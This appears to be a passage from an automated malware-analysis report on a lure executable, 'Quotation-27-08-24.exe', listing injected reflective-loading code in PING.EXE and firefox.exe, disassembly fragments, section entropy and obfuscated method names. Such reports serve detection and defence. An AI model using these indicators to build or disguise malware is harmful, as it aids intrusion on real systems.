            Source: 9.2.PING.EXE.327cd14.2.raw.unpack, Form2.cs.Net Code: _206E_206E_206E_200F_200D_202E_206A_206C_202D_200D_200D_200D_200F_206C_202A_202A_200B_202E_206E_206B_206D_206F_202B_200B_200C_200B_202D_202C_202A_202C_200E_202D_200F_206E_206B_200F_206D_202D_200B_206A_202E System.Reflection.Assembly.Load(byte[])
            Source: 12.2.firefox.exe.3f52cd14.0.raw.unpack, Form2.cs.Net Code: _206E_206E_206E_200F_200D_202E_206A_206C_202D_200D_200D_200D_200F_206C_202A_202A_200B_202E_206E_206B_206D_206F_202B_200B_200C_200B_202D_202C_202A_202C_200E_202D_200F_206E_206B_200F_206D_202D_200B_206A_202E System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_05388975 push 690524AEh; ret 0_2_0538897A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_05388A4C push 690524AEh; ret 0_2_05388A51
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_053B8B00 push eax; mov dword ptr [esp], ecx0_2_053B8B04
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004018AD push eax; retf 4_2_004018B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00413103 push ds; ret 4_2_00413139
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004051E3 push edi; retf 4_2_004051E4
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0041EA2B push esp; iretd 4_2_0041EA2C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004234D3 push 0AA621A6h; retf 4_2_00423530
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004014E5 push eax; ret 4_2_004014F1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0041E543 push esi; iretd 4_2_0041E550
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0041E57D push esp; iretd 4_2_0041E5A3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0041E53B push esi; iretd 4_2_0041E550
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00401653 push eax; ret 4_2_0040165D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00424E13 push es; retf 4_2_00424ECC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00403630 push eax; ret 4_2_00403632
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F3225F pushad ; ret 4_2_00F327F9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F327FA pushad ; ret 4_2_00F327F9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F3283D push eax; iretd 4_2_00F32858
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F609AD push ecx; mov dword ptr [esp], ecx4_2_00F609B6
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F31366 push eax; iretd 4_2_00F31369
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_029A8230 push esp; iretd 8_2_029A8256
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_029A81EE push esi; iretd 8_2_029A8203
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_0298EE96 push edi; retf 8_2_0298EE97
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_029A86DE push esp; iretd 8_2_029A86DF
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_0299CDB6 push ds; ret 8_2_0299CDEC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_05815D30 push esp; retf 8_2_05815D31
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_0582A4B1 push esp; iretd 8_2_0582A4B2
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_05810C69 push edi; retf 8_2_05810C6A
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_05829FC1 push esi; iretd 8_2_05829FD6
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_05829FC9 push esi; iretd 8_2_05829FD6
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_05815FFA pushad ; ret 8_2_0581600B
            Source: Quotation-27-08-24.exeStatic PE information: section name: .text entropy: 7.7665587747016405
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, RC9YV2CohNNtWAN9eQh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MYrOBriFfl', 'SWZOcab91Y', 'KU5OnvtxNC', 'TZxObRu2O8', 'yDROLvaDEU', 'cO0OP1Nj8O', 'Y5MOrbw4wd'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, C4rU7FjAjSAnMYttCh.csHigh entropy of concatenated method names: 'HOEvSX1ZH8', 'TZov9lgbSO', 'DuOvYAvwVI', 'QEhYT4geM0', 'WoUYzMxamh', 'He0vFDQI6S', 'GS9vCdJGol', 'BvjvWTicIC', 'NVFvoqdf05', 'RNQvklxRnG'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, M5ZwT7wH5KHQyEZZcg.csHigh entropy of concatenated method names: 'oEvofNDAXh', 'fmIoSOpBnm', 'Pd5oEoeqEG', 'SwYo9TVXYF', 'qxgoX6hyWD', 'mk3oYaGWd1', 'bTSovMdiPl', 'XQyowxxyiX', 'm9molTdjpI', 'uPio3HaWSm'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, mmviDc7N0caHLWtF2t.csHigh entropy of concatenated method names: 'Xaaesc4c0A', 'jEue8wGMh2', 'MbeeV8hZEu', 'MAweHXg0dD', 'pIDeBbLSqa', 'CESeAsvigN', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, MxmaASPmsUBimDUl04.csHigh entropy of concatenated method names: 'sTMZ4wNijT', 'CGvZTloScv', 'vmIeFyBY0h', 'JC7eC0RmD3', 'bBLZ2h6PJL', 'zB0ZyQ7DuK', 'D5MZi4iekJ', 'bvEZB9mSZQ', 'TM2Zcqssts', 'oMWZnCq1ku'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, EwT4tW5uadbjQJAJ5v.csHigh entropy of concatenated method names: 'k9xEBSeSPG', 'AWDEcHlb5R', 'KLiEntOs9G', 'jOREbQYIVe', 'YfIELyIKH1', 'nqeEPbQCSF', 'epdErpm3Jx', 'aEUE4AlAib', 'UGTE7fiLka', 'PGYETfCiwu'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, kK9H7jbFSqaYpGNiAx.csHigh entropy of concatenated method names: 'djUZ326pSH', 'JcsZqU4XBa', 'ToString', 'O7JZSOA15D', 'NnZZEQewwY', 'ao5Z9vmCIX', 'x1UZXy2yG5', 'EhNZYHHJ1T', 'Ml8Zvbdsbd', 'eUsZw6wOdj'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, WqQg4C4jdHpXk16BlW.csHigh entropy of concatenated method names: 'OHaeSmSWcC', 'gSHeEEyrWt', 'udQe9oNcDD', 'AAueXqWSDM', 'aaTeYgePO3', 'bJZevLBW0l', 'HMNewabCvs', 'VF0elFeiwg', 'Kqne3G4kRg', 'S3NeqCCPNH'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, FyBPYesdE919Yx0W9e.csHigh entropy of concatenated method names: 'PGJYf4YFhj', 'e5fYERMhPd', 'iDjYXWEgeV', 'xMCYv1hTo6', 'Ri6YwGtyKs', 'm8eXLPufoG', 'IH2XPVYAlQ', 'QngXroxiPe', 'LJNX4WKoLV', 'W20X7BMyw2'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, lFcmv1U4dviCCDrbve.csHigh entropy of concatenated method names: 'UZnvgPYY53', 'UjuvuoyPgv', 'CC7vDdFioU', 'mBJvaLbVvc', 'Q3Ov02rjPt', 'txUvtJqA7E', 'Dt0vdSUqtG', 'UxEv5lhbWq', 'e2XvN0mNee', 'dQPvR7QjAf'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, SEGJB7BbOJIkArUsbG.csHigh entropy of concatenated method names: 'p0ZJhrTcy6', 'y5bJyKsTB8', 'jpvJBumsdm', 'BPmJcs69UX', 'wglJ8WFN14', 'v9eJVZ2ET4', 'pktJHatJMG', 'MFfJAg8Z2H', 'e72J1Xo02d', 'ScFJjbJTKW'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, jjsengi1HStSOep4i4.csHigh entropy of concatenated method names: 'PR0G5lY49V', 'HTlGNgOPDN', 'm7vGsL7fLK', 'PKyG8qrQFE', 'YMOGHsvmSb', 'RMAGAeR3gU', 'E1FGjvPIQM', 'jYCGI2cJGe', 'F2EGhiBy5R', 'rTBG2Q0tq9'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, vSvFUaRGAmW0kj7Lde.csHigh entropy of concatenated method names: 'd4CX09d69c', 'wu1Xdtsjlu', 'cOw9VvfQ1d', 'M6R9HRyIGN', 'fZR9AlmEko', 'M7Y91BYHmh', 'R5V9jLIaLS', 'Ajm9IPV0dk', 'C2X9UvsW2v', 'R9j9hk80Hg'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, ha0jl6nQL84oCNUF25.csHigh entropy of concatenated method names: 'ToString', 'JDfK2q4UX0', 'JSnK8kswlq', 'mx2KVwi0HS', 'NdPKHoE2aB', 'Y2DKAYGni3', 'kfMK1cefOT', 'YjUKjaCTiK', 'Fu1KIP99Ma', 'GjBKUW1Uva'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, C56ta8zHuuIeifniuo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CBLMGBWUFu', 'KRUMJ5kA3E', 'MI2MKfpnRC', 'oJXMZx8sTM', 'NeJMeBxj7x', 'zsYMMPLIqv', 'eL7MOG7hws'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, Pk7gKCWxMS2D27EAuq.csHigh entropy of concatenated method names: 'MgZDAnxmX', 'SegaYPSO2', 'jJbt0j19M', 'LFEdl2M2V', 'RyGNZbgYh', 'kpGRXRoX8', 'NBOvVauOthssnSCThT', 'fqBX3nVmDk8DFtdqNK', 'UeFevn6KT', 'YntO0obEu'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, PLN33dCFiGTP0HXfeD3.csHigh entropy of concatenated method names: 'CHSMgxExNq', 'x2XMuOuRlj', 'So5MDjnESa', 'sf0Ma3MeBD', 'cnbM0pm3vm', 'rJEMtiohoj', 'BrIMdnR2yu', 'evXM5SQT6Z', 'RN9MNN6vv6', 's2YMRyoU2r'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, AFjkxcES1oRaQ4dZsJ.csHigh entropy of concatenated method names: 'Dispose', 'JCxC72SbDX', 'gToW8UdhoC', 'SHVbbV517d', 'nrqCTQg4Cj', 'CHpCzXk16B', 'ProcessDialogKey', 'lW3WFmviDc', 'E0cWCaHLWt', 'a2tWWgWtnR'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, EdTxQuNgOo1V5kLIjO.csHigh entropy of concatenated method names: 'FY79aeFKY2', 'tXR9t7xJnQ', 'gIT95f5clC', 'yO19N9WxLt', 'W7w9JGbY6p', 'dch9KWqajT', 'BJy9ZZuQLc', 'wCd9e7bKKL', 'GYH9MDyloV', 'H2P9OusFdd'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, yWtnRxT5Mv2k8WufJX.csHigh entropy of concatenated method names: 'PPBMC7nPwx', 'P1QMo0Ju6Z', 'ESqMkTvtxs', 'dYNMSJFRvU', 'hObMEKMc4E', 'zBHMX5vdus', 'ppRMY6HiIj', 'M67erhdr9x', 'UlPe4FU7RU', 'dOhe7xbNQn'
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, fTHmXrkWA2bYu5qWfc.csHigh entropy of concatenated method names: 'fQ5CvwT4tW', 'yadCwbjQJA', 'ygOC3o1V5k', 'UIjCqOmSvF', 'L7LCJdeRyB', 'VYeCKdE919', 'BiVfpIGHYJDEBiMZUg', 'raiAfUDRBO44OjmNDx', 'Q6OCCW8MIs', 'pG8Coy61dQ'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, RC9YV2CohNNtWAN9eQh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MYrOBriFfl', 'SWZOcab91Y', 'KU5OnvtxNC', 'TZxObRu2O8', 'yDROLvaDEU', 'cO0OP1Nj8O', 'Y5MOrbw4wd'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, C4rU7FjAjSAnMYttCh.csHigh entropy of concatenated method names: 'HOEvSX1ZH8', 'TZov9lgbSO', 'DuOvYAvwVI', 'QEhYT4geM0', 'WoUYzMxamh', 'He0vFDQI6S', 'GS9vCdJGol', 'BvjvWTicIC', 'NVFvoqdf05', 'RNQvklxRnG'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, M5ZwT7wH5KHQyEZZcg.csHigh entropy of concatenated method names: 'oEvofNDAXh', 'fmIoSOpBnm', 'Pd5oEoeqEG', 'SwYo9TVXYF', 'qxgoX6hyWD', 'mk3oYaGWd1', 'bTSovMdiPl', 'XQyowxxyiX', 'm9molTdjpI', 'uPio3HaWSm'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, mmviDc7N0caHLWtF2t.csHigh entropy of concatenated method names: 'Xaaesc4c0A', 'jEue8wGMh2', 'MbeeV8hZEu', 'MAweHXg0dD', 'pIDeBbLSqa', 'CESeAsvigN', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, MxmaASPmsUBimDUl04.csHigh entropy of concatenated method names: 'sTMZ4wNijT', 'CGvZTloScv', 'vmIeFyBY0h', 'JC7eC0RmD3', 'bBLZ2h6PJL', 'zB0ZyQ7DuK', 'D5MZi4iekJ', 'bvEZB9mSZQ', 'TM2Zcqssts', 'oMWZnCq1ku'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, EwT4tW5uadbjQJAJ5v.csHigh entropy of concatenated method names: 'k9xEBSeSPG', 'AWDEcHlb5R', 'KLiEntOs9G', 'jOREbQYIVe', 'YfIELyIKH1', 'nqeEPbQCSF', 'epdErpm3Jx', 'aEUE4AlAib', 'UGTE7fiLka', 'PGYETfCiwu'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, kK9H7jbFSqaYpGNiAx.csHigh entropy of concatenated method names: 'djUZ326pSH', 'JcsZqU4XBa', 'ToString', 'O7JZSOA15D', 'NnZZEQewwY', 'ao5Z9vmCIX', 'x1UZXy2yG5', 'EhNZYHHJ1T', 'Ml8Zvbdsbd', 'eUsZw6wOdj'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, WqQg4C4jdHpXk16BlW.csHigh entropy of concatenated method names: 'OHaeSmSWcC', 'gSHeEEyrWt', 'udQe9oNcDD', 'AAueXqWSDM', 'aaTeYgePO3', 'bJZevLBW0l', 'HMNewabCvs', 'VF0elFeiwg', 'Kqne3G4kRg', 'S3NeqCCPNH'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, FyBPYesdE919Yx0W9e.csHigh entropy of concatenated method names: 'PGJYf4YFhj', 'e5fYERMhPd', 'iDjYXWEgeV', 'xMCYv1hTo6', 'Ri6YwGtyKs', 'm8eXLPufoG', 'IH2XPVYAlQ', 'QngXroxiPe', 'LJNX4WKoLV', 'W20X7BMyw2'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, lFcmv1U4dviCCDrbve.csHigh entropy of concatenated method names: 'UZnvgPYY53', 'UjuvuoyPgv', 'CC7vDdFioU', 'mBJvaLbVvc', 'Q3Ov02rjPt', 'txUvtJqA7E', 'Dt0vdSUqtG', 'UxEv5lhbWq', 'e2XvN0mNee', 'dQPvR7QjAf'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, SEGJB7BbOJIkArUsbG.csHigh entropy of concatenated method names: 'p0ZJhrTcy6', 'y5bJyKsTB8', 'jpvJBumsdm', 'BPmJcs69UX', 'wglJ8WFN14', 'v9eJVZ2ET4', 'pktJHatJMG', 'MFfJAg8Z2H', 'e72J1Xo02d', 'ScFJjbJTKW'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, jjsengi1HStSOep4i4.csHigh entropy of concatenated method names: 'PR0G5lY49V', 'HTlGNgOPDN', 'm7vGsL7fLK', 'PKyG8qrQFE', 'YMOGHsvmSb', 'RMAGAeR3gU', 'E1FGjvPIQM', 'jYCGI2cJGe', 'F2EGhiBy5R', 'rTBG2Q0tq9'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, vSvFUaRGAmW0kj7Lde.csHigh entropy of concatenated method names: 'd4CX09d69c', 'wu1Xdtsjlu', 'cOw9VvfQ1d', 'M6R9HRyIGN', 'fZR9AlmEko', 'M7Y91BYHmh', 'R5V9jLIaLS', 'Ajm9IPV0dk', 'C2X9UvsW2v', 'R9j9hk80Hg'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, ha0jl6nQL84oCNUF25.csHigh entropy of concatenated method names: 'ToString', 'JDfK2q4UX0', 'JSnK8kswlq', 'mx2KVwi0HS', 'NdPKHoE2aB', 'Y2DKAYGni3', 'kfMK1cefOT', 'YjUKjaCTiK', 'Fu1KIP99Ma', 'GjBKUW1Uva'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, C56ta8zHuuIeifniuo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CBLMGBWUFu', 'KRUMJ5kA3E', 'MI2MKfpnRC', 'oJXMZx8sTM', 'NeJMeBxj7x', 'zsYMMPLIqv', 'eL7MOG7hws'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, Pk7gKCWxMS2D27EAuq.csHigh entropy of concatenated method names: 'MgZDAnxmX', 'SegaYPSO2', 'jJbt0j19M', 'LFEdl2M2V', 'RyGNZbgYh', 'kpGRXRoX8', 'NBOvVauOthssnSCThT', 'fqBX3nVmDk8DFtdqNK', 'UeFevn6KT', 'YntO0obEu'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, PLN33dCFiGTP0HXfeD3.csHigh entropy of concatenated method names: 'CHSMgxExNq', 'x2XMuOuRlj', 'So5MDjnESa', 'sf0Ma3MeBD', 'cnbM0pm3vm', 'rJEMtiohoj', 'BrIMdnR2yu', 'evXM5SQT6Z', 'RN9MNN6vv6', 's2YMRyoU2r'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, AFjkxcES1oRaQ4dZsJ.csHigh entropy of concatenated method names: 'Dispose', 'JCxC72SbDX', 'gToW8UdhoC', 'SHVbbV517d', 'nrqCTQg4Cj', 'CHpCzXk16B', 'ProcessDialogKey', 'lW3WFmviDc', 'E0cWCaHLWt', 'a2tWWgWtnR'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, EdTxQuNgOo1V5kLIjO.csHigh entropy of concatenated method names: 'FY79aeFKY2', 'tXR9t7xJnQ', 'gIT95f5clC', 'yO19N9WxLt', 'W7w9JGbY6p', 'dch9KWqajT', 'BJy9ZZuQLc', 'wCd9e7bKKL', 'GYH9MDyloV', 'H2P9OusFdd'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, yWtnRxT5Mv2k8WufJX.csHigh entropy of concatenated method names: 'PPBMC7nPwx', 'P1QMo0Ju6Z', 'ESqMkTvtxs', 'dYNMSJFRvU', 'hObMEKMc4E', 'zBHMX5vdus', 'ppRMY6HiIj', 'M67erhdr9x', 'UlPe4FU7RU', 'dOhe7xbNQn'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, fTHmXrkWA2bYu5qWfc.csHigh entropy of concatenated method names: 'fQ5CvwT4tW', 'yadCwbjQJA', 'ygOC3o1V5k', 'UIjCqOmSvF', 'L7LCJdeRyB', 'VYeCKdE919', 'BiVfpIGHYJDEBiMZUg', 'raiAfUDRBO44OjmNDx', 'Q6OCCW8MIs', 'pG8Coy61dQ'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, RC9YV2CohNNtWAN9eQh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MYrOBriFfl', 'SWZOcab91Y', 'KU5OnvtxNC', 'TZxObRu2O8', 'yDROLvaDEU', 'cO0OP1Nj8O', 'Y5MOrbw4wd'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, C4rU7FjAjSAnMYttCh.csHigh entropy of concatenated method names: 'HOEvSX1ZH8', 'TZov9lgbSO', 'DuOvYAvwVI', 'QEhYT4geM0', 'WoUYzMxamh', 'He0vFDQI6S', 'GS9vCdJGol', 'BvjvWTicIC', 'NVFvoqdf05', 'RNQvklxRnG'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.csHigh entropy of concatenated method names: 'oEvofNDAXh', 'fmIoSOpBnm', 'Pd5oEoeqEG', 'SwYo9TVXYF', 'qxgoX6hyWD', 'mk3oYaGWd1', 'bTSovMdiPl', 'XQyowxxyiX', 'm9molTdjpI', 'uPio3HaWSm'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, mmviDc7N0caHLWtF2t.csHigh entropy of concatenated method names: 'Xaaesc4c0A', 'jEue8wGMh2', 'MbeeV8hZEu', 'MAweHXg0dD', 'pIDeBbLSqa', 'CESeAsvigN', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, MxmaASPmsUBimDUl04.csHigh entropy of concatenated method names: 'sTMZ4wNijT', 'CGvZTloScv', 'vmIeFyBY0h', 'JC7eC0RmD3', 'bBLZ2h6PJL', 'zB0ZyQ7DuK', 'D5MZi4iekJ', 'bvEZB9mSZQ', 'TM2Zcqssts', 'oMWZnCq1ku'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, EwT4tW5uadbjQJAJ5v.csHigh entropy of concatenated method names: 'k9xEBSeSPG', 'AWDEcHlb5R', 'KLiEntOs9G', 'jOREbQYIVe', 'YfIELyIKH1', 'nqeEPbQCSF', 'epdErpm3Jx', 'aEUE4AlAib', 'UGTE7fiLka', 'PGYETfCiwu'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, kK9H7jbFSqaYpGNiAx.csHigh entropy of concatenated method names: 'djUZ326pSH', 'JcsZqU4XBa', 'ToString', 'O7JZSOA15D', 'NnZZEQewwY', 'ao5Z9vmCIX', 'x1UZXy2yG5', 'EhNZYHHJ1T', 'Ml8Zvbdsbd', 'eUsZw6wOdj'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, WqQg4C4jdHpXk16BlW.csHigh entropy of concatenated method names: 'OHaeSmSWcC', 'gSHeEEyrWt', 'udQe9oNcDD', 'AAueXqWSDM', 'aaTeYgePO3', 'bJZevLBW0l', 'HMNewabCvs', 'VF0elFeiwg', 'Kqne3G4kRg', 'S3NeqCCPNH'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, FyBPYesdE919Yx0W9e.csHigh entropy of concatenated method names: 'PGJYf4YFhj', 'e5fYERMhPd', 'iDjYXWEgeV', 'xMCYv1hTo6', 'Ri6YwGtyKs', 'm8eXLPufoG', 'IH2XPVYAlQ', 'QngXroxiPe', 'LJNX4WKoLV', 'W20X7BMyw2'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, lFcmv1U4dviCCDrbve.csHigh entropy of concatenated method names: 'UZnvgPYY53', 'UjuvuoyPgv', 'CC7vDdFioU', 'mBJvaLbVvc', 'Q3Ov02rjPt', 'txUvtJqA7E', 'Dt0vdSUqtG', 'UxEv5lhbWq', 'e2XvN0mNee', 'dQPvR7QjAf'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, SEGJB7BbOJIkArUsbG.csHigh entropy of concatenated method names: 'p0ZJhrTcy6', 'y5bJyKsTB8', 'jpvJBumsdm', 'BPmJcs69UX', 'wglJ8WFN14', 'v9eJVZ2ET4', 'pktJHatJMG', 'MFfJAg8Z2H', 'e72J1Xo02d', 'ScFJjbJTKW'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, jjsengi1HStSOep4i4.csHigh entropy of concatenated method names: 'PR0G5lY49V', 'HTlGNgOPDN', 'm7vGsL7fLK', 'PKyG8qrQFE', 'YMOGHsvmSb', 'RMAGAeR3gU', 'E1FGjvPIQM', 'jYCGI2cJGe', 'F2EGhiBy5R', 'rTBG2Q0tq9'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, vSvFUaRGAmW0kj7Lde.csHigh entropy of concatenated method names: 'd4CX09d69c', 'wu1Xdtsjlu', 'cOw9VvfQ1d', 'M6R9HRyIGN', 'fZR9AlmEko', 'M7Y91BYHmh', 'R5V9jLIaLS', 'Ajm9IPV0dk', 'C2X9UvsW2v', 'R9j9hk80Hg'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, ha0jl6nQL84oCNUF25.csHigh entropy of concatenated method names: 'ToString', 'JDfK2q4UX0', 'JSnK8kswlq', 'mx2KVwi0HS', 'NdPKHoE2aB', 'Y2DKAYGni3', 'kfMK1cefOT', 'YjUKjaCTiK', 'Fu1KIP99Ma', 'GjBKUW1Uva'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, C56ta8zHuuIeifniuo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CBLMGBWUFu', 'KRUMJ5kA3E', 'MI2MKfpnRC', 'oJXMZx8sTM', 'NeJMeBxj7x', 'zsYMMPLIqv', 'eL7MOG7hws'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, Pk7gKCWxMS2D27EAuq.csHigh entropy of concatenated method names: 'MgZDAnxmX', 'SegaYPSO2', 'jJbt0j19M', 'LFEdl2M2V', 'RyGNZbgYh', 'kpGRXRoX8', 'NBOvVauOthssnSCThT', 'fqBX3nVmDk8DFtdqNK', 'UeFevn6KT', 'YntO0obEu'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, PLN33dCFiGTP0HXfeD3.csHigh entropy of concatenated method names: 'CHSMgxExNq', 'x2XMuOuRlj', 'So5MDjnESa', 'sf0Ma3MeBD', 'cnbM0pm3vm', 'rJEMtiohoj', 'BrIMdnR2yu', 'evXM5SQT6Z', 'RN9MNN6vv6', 's2YMRyoU2r'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, AFjkxcES1oRaQ4dZsJ.csHigh entropy of concatenated method names: 'Dispose', 'JCxC72SbDX', 'gToW8UdhoC', 'SHVbbV517d', 'nrqCTQg4Cj', 'CHpCzXk16B', 'ProcessDialogKey', 'lW3WFmviDc', 'E0cWCaHLWt', 'a2tWWgWtnR'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, EdTxQuNgOo1V5kLIjO.csHigh entropy of concatenated method names: 'FY79aeFKY2', 'tXR9t7xJnQ', 'gIT95f5clC', 'yO19N9WxLt', 'W7w9JGbY6p', 'dch9KWqajT', 'BJy9ZZuQLc', 'wCd9e7bKKL', 'GYH9MDyloV', 'H2P9OusFdd'
